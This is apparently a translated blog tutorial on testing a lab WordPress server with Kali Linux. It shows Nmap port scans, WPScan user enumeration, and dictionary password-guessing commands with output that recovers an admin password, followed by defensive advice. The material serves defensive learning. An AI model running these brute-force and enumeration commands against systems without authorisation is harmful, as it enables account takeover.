Find and not neutralize: writing penetration tests with Kali Linux
Kali and other similar tools help detect vulnerabilities in your software. And it’s better if you are the first to find them, and not the intruders.
You can’t hide an awl in a sack: out of ignorance (though in some cases – intentionally) even large corporations leave holes in their security system. It is vital to (1) localize and (2) fix them as quickly as possible. Fortunately, there are many different products that help with the first point. Among them are Kali, a Linux distribution designed for security testing. In this article, I will show you how to use Kali Linux to investigate your system and find weaknesses by simulating an attacker.
The Kali distribution includes many tools, all of which are open source. It is enough to run the installation of the distribution and all these tools will be available out of the box.
Picture: Peter Gervase,CC BY-SA 4.0
I will use two systems as test subjects:
- kali.usersys.redhat.com: 30 GB memory and 6 virtual CPUs. This system will scan the victim and launch attacks.
- vulnerable.usersys.redhat.com: a system with Red Hat Enterprise Linux 8 on board. Here it will need to be attacked.
I mentioned the technical characteristics of the equipment here for a reason. Some of our tasks are quite demanding on the hardware, especially the system 2 CPU, which will run the WordPress security scanner (WPScan).
Search for open ports
I started with a basic system scan 2. Scanning the system with Nmap, you can find out which ports and services are visible from system 1 starting the scan.
Picture: Peter Gervase,CC BY-SA 4.0
So, the first thing to do is to find some “interesting” open ports – potential weaknesses. In fact, any open port is interesting because it is more likely to compromise the network. In this example, 21, 22, 80, and 443 are also ports for frequently used services. But for now, I’m just doing intelligence and trying to get as much information as possible about the system I want to hack.
After that, for a deeper analysis, I’ll select port 80 and run the Nmap command with the -p 80 and -A arguments. This allows you to get information about the operating system and the application that uses port 80.
Picture: Peter Gervase,CC BY-SA 4.0
Here we are interested in the following lines:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-generator: WordPress 5.6.1
Finding information about users
Since I now know this is a WordPress server, I can use WPScan to get information on potential vulnerabilities. It would be nice to find several usernames and their passwords. To find them in a given WordPress instance, use the –enumerate u options:
┌──(rootkali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --enumerate u
_______________________________________________________________
__ _______ _____
/ / __ / ____|
/ / /| |__) | (___ ___ __ _ _ __
/ / / | ___/ ___ / __|/ _` | '_
/ / | | ____) | (__| (_| | | | |
/ / |_| |_____/ ___|__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic — https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Tue Feb 16 21:38:49 2021
Interesting Finding(s):
...
[i] User(s) Identified:
[+] admin
| Found By: Author Posts — Display Name (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] pgervase
| Found By: Author Posts — Display Name (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
Great, found two users: admin and pgervase… I will try to guess the password for the admin user using password dictionaries – a text file with a set of possible options. I will take dictionaries of 3,231 and 3,543,076,137 lines.
Password guessing with dictionary attack
Various tools can be used for dictionary attacks. Here are two example commands with Nmap and WPScan:
# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com
# wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt
These two tools, of course, can do much more, but they are also suitable for guessing passwords.
But this WPScan command, for example, displays the password at the end of the file:
┌──(rootkali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin
_______________________________________________________________
__ _______ _____
/ / __ / ____|
/ / /| |__) | (___ ___ __ _ _ __
/ / / | ___/ ___ / __|/ _` | '_
/ / | | ____) | (__| (_| | | | |
/ / |_| |_____/ ___|__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic — https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Thu Feb 18 20:32:13 2021
Interesting Finding(s):
…..
[+] Performing password attack on Wp Login against 1 user/s
Trying admin / redhat Time: 00:01:57
<==================================================================================================================>
(3231 / 3231) 100.00% Time: 00:01:57
Trying admin / redhat Time: 00:01:57
<=========================================================
> (3231 / 6462) 50.00%
ETA: ??:??:??
[SUCCESS] — admin / redhat
[!] Valid Combinations Found:
| Username: admin, Password: redhat
Section Valid Combinations Found at the end contains the username admin and his password. It took only two minutes to iterate over 3,231 lines.
I have another dictionary file with 3,238,659,984 unique entries, which will take much longer.
Nmap produces results much faster:
┌──(rootkali)-[~]
└─# nmap -sV --script http-wordpress-brute
--script-args userdb=users.txt,passdb=password.txt,threads=6
vulnerable.usersys.redhat.com
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST
Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
Host is up (0.00015s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
| http-wordpress-brute:
| Accounts:
| admin:redhat — Valid credentials <<<<<<<
| pgervase:redhat — Valid credentials <<<<<<<
|_ Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB
MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds
True, such a scan can be tracked by the HTTPD logs that will be detected in the compromised system:
10.19.47.170
- — [18/Feb/2021:20:14:01 -0500] «POST /wp-login.php HTTP/1.1» 200 7575
«http://vulnerable.usersys.redhat.com/» «WPScan v3.8.10
(https://wpscan.org/)»
10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php
HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan
v3.8.10 (https://wpscan.org/)»
10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php
HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan
v3.8.10 (https://wpscan.org/)»
10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php
HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan
v3.8.10 (https://wpscan.org/)»
10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php
HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan
v3.8.10 (https://wpscan.org/)»
10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php
HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan
v3.8.10 (https://wpscan.org/)»
10.19.47.170 — - [18/Feb/2021:20:14:02 -0500] «POST /wp-login.php
HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan
v3.8.10 (https://wpscan.org/)»
10.19.47.170 — - [18/Feb/2021:20:14:02 -0500] «POST /wp-login.php
HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan
v3.8.10 (https://wpscan.org/)»
10.19.47.170 — - [18/Feb/2021:20:14:02 -0500] «POST /wp-login.php
HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan
v3.8.10 (https://wpscan.org/)»
Search for Heartbleed Vulnerability
To get information about the HTTPS server and SSL / TLS protocols, I use the sslscan command:
┌──(rootkali)-[~]
└─# sslscan vulnerable.usersys.redhat.com
Version: 2.0.6-static
OpenSSL 1.1.1i-dev xx XXX xxxx
Connected to 10.19.47.242
Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 disabled
TLSv1.1 disabled
TLSv1.2 enabled
TLSv1.3 enabled
<snip>
We see that in the versions of the protocols that are used on the server, Heartbleed vulnerability not found:
Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
Well, it means that through the Heartbeat module I cannot access the RAM and server data. Well … it’s not destiny 🙂
Hacking Prevention and Protection Tips
You can write many articles on how to resist attacks by hackers of all stripes. Here I will limit myself to general recommendations:
- Study your system: which ports are open, which ports should be open, who should be able to see these ports and how much traffic should go through them. Nmap will help you.
- Use the best and best practices: what is considered good practice today will no longer be good practice in the future. It is important to keep abreast of the latest advances in information security.
- Customize your products and their environment wisely: for example, instead of letting an attacker constantly attack your WordPress system, block their IP address and limit the number of login attempts. However, blocking an IP address is often useless because attackers can use different addresses. However, this setting is easy to enable and will help repel at least some attacks.
- Create and maintain quality backups: If an attacker breaks into one or more of your systems, the ability to recover data without dancing with a tambourine will save you a lot of time and money.
- Check your logs: as the examples above show, scan commands and other penetrating manipulations can leave a lot of logs. If you spot them in time, you will have time to protect yourself from hacking.
- Update your system, applications and any additional modules: specialists US Institute of Standards and Technology are confident that “updates are usually the most effective way to fix vulnerabilities and can often be the only truly effective solution.”
- Use additional tools from your software vendors: for example, a Red Hat Enterprise Linux subscription includes a tool Red hat insightsthat allows you to customize your system and warns you about potential security threats in a timely manner.
Useful materials (in English)
What is described in this article is just the tip of the iceberg. To dive deeper, you can explore the following resources:
Cloud servers from Macleod fast and safe.
Register using the link above or by clicking on the banner and get a 10% discount for the first month of renting a server of any configuration!